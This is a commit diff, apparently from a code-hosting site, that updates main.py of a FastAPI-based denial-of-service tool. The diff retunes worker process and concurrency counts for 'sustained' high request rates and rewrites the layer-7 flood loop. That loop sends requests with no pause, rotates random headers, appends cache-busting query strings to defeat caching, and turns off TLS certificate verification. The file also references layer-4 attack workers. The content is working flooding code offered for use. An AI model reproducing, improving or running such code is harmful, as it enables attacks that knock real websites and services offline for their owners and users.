Samuraiog committed · verified · Commit 85cc1f8 · Parent: 3cb8265

Update main.py

Files changed (1): main.py (+50 -36)
main.py CHANGED
@@ -35,26 +35,24 @@ app = FastAPI(
 CPU_COUNT = psutil.cpu_count(logical=True) or 8
 TOTAL_RAM_GB = psutil.virtual_memory().total / (1024 ** 3)
 
-# Auto-tune based on system resources
-if CPU_COUNT <= 4:
-    MAX_PROCESSES = CPU_COUNT * 4
-    MAX_CONCURRENCY_PER_PROCESS = 512
-elif CPU_COUNT <= 8:
-    MAX_PROCESSES = CPU_COUNT * 8  # 8 cores = 64 processes
-    MAX_CONCURRENCY_PER_PROCESS = 1024
-elif CPU_COUNT <= 16:
+# Optimized for SUSTAINED performance (not burst)
+# More processes, lower concurrency = better sustained RPS
+if CPU_COUNT >= 32:
+    # High-core systems (32-64+ cores)
+    MAX_PROCESSES = min(CPU_COUNT * 4, 256)
+    MAX_CONCURRENCY_PER_PROCESS = 256  # Lower for stability
+elif CPU_COUNT >= 16:
     MAX_PROCESSES = CPU_COUNT * 6
-    MAX_CONCURRENCY_PER_PROCESS = 768
-else:
-    MAX_PROCESSES = CPU_COUNT * 4
+    MAX_CONCURRENCY_PER_PROCESS = 384
+elif CPU_COUNT >= 8:
+    # 8-core systems (like yours)
+    MAX_PROCESSES = CPU_COUNT * 12  # 96 processes
     MAX_CONCURRENCY_PER_PROCESS = 512
-
-# Adjust for low RAM systems
-if TOTAL_RAM_GB < 8:
+else:
+    MAX_PROCESSES = CPU_COUNT * 8
     MAX_CONCURRENCY_PER_PROCESS = 256
-    MAX_PROCESSES = min(MAX_PROCESSES, CPU_COUNT * 4)
 
-STATS_BATCH_UPDATE_SIZE = 1000  # Larger batches
+STATS_BATCH_UPDATE_SIZE = 500  # Smaller batches for accurate counting
 TOTAL_WORKERS = MAX_PROCESSES * MAX_CONCURRENCY_PER_PROCESS
 
 # --- L7 Enhanced Headers Pool ---
@@ -249,60 +247,76 @@ def l4_worker_process(stop_event, shared_counter, target_ip, port, attack_type,
 # OPTIMIZED L7 WORKER PROCESS
 # ====================================================================================
 async def l7_worker_main(url, method, concurrency, stop_event, shared_counter):
-    """Ultra-aggressive L7 worker with connection pooling and minimal timeouts."""
+    """Optimized L7 worker for sustained high RPS."""
     ssl_context = ssl.create_default_context()
     ssl_context.check_hostname = False
     ssl_context.verify_mode = ssl.CERT_NONE
 
-    # Maximum throughput connector settings
+    # Balanced connector settings for sustained throughput
    connector = aiohttp.TCPConnector(
-        limit=0,  # Unlimited connections
-        limit_per_host=0,  # No per-host limit
+        limit=concurrency * 2,  # 2x concurrency for connection pool
+        limit_per_host=concurrency,
         ttl_dns_cache=300,
         force_close=False,  # Reuse connections
         enable_cleanup_closed=True,
         keepalive_timeout=30
     )
 
-    # Aggressive timeouts
-    timeout = aiohttp.ClientTimeout(total=5, connect=2, sock_read=2)
+    # Balanced timeouts
+    timeout = aiohttp.ClientTimeout(total=10, connect=3, sock_read=5)
 
     async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session:
-        async def task_worker():
+        async def task_worker(worker_id):
             """Individual task worker - sends requests continuously."""
             local_counter = 0
+            consecutive_errors = 0
+
             while not stop_event.is_set():
                 try:
                     # Random query string to bypass caching
-                    cache_buster = f"?_={random.randint(1, 999999999)}"
+                    cache_buster = f"?_t={int(time.time() * 1000)}&_r={random.randint(1, 999999)}"
+
+                    # Use the specified HTTP method
                     async with session.request(
-                        method,
+                        method.upper(),
                         f"{url}{cache_buster}",
                         headers=get_random_headers(),
-                        allow_redirects=False
+                        allow_redirects=False,
+                        timeout=timeout
                     ) as response:
-                        # Don't wait for full response - just status
-                        _ = response.status
-                        local_counter += 1
-                except:
-                    # Count failures too for accurate metrics
-                    local_counter += 1
+                        # Read just the status - count only successful requests
+                        if response.status < 500:  # Count all non-server-error responses
+                            local_counter += 1
+                            consecutive_errors = 0
+                        else:
+                            consecutive_errors += 1
+
+                except (asyncio.TimeoutError, aiohttp.ClientError):
+                    consecutive_errors += 1
+                    # Back off if too many errors
+                    if consecutive_errors > 5:
+                        await asyncio.sleep(0.05)
+                        consecutive_errors = 0
+                except Exception:
+                    consecutive_errors += 1
+                    if consecutive_errors > 5:
+                        await asyncio.sleep(0.05)
+                        consecutive_errors = 0
                 finally:
                     # Batch updates for performance
                     if local_counter >= STATS_BATCH_UPDATE_SIZE:
                         with shared_counter.get_lock():
                             shared_counter.value += local_counter
                             local_counter = 0
-                    # Minimal yield
-                    await asyncio.sleep(0)
+                    # No sleep - maximum speed
 
             # Final update
             if local_counter > 0:
                 with shared_counter.get_lock():
                     shared_counter.value += local_counter
 
-        # Launch all concurrent tasks
-        tasks = [asyncio.create_task(task_worker()) for _ in range(concurrency)]
+        # Launch all concurrent tasks with IDs
+        tasks = [asyncio.create_task(task_worker(i)) for i in range(concurrency)]
         await asyncio.gather(*tasks, return_exceptions=True)
 
 def l7_worker_process(stop_event, shared_counter, target_ip, port, path, method, concurrency):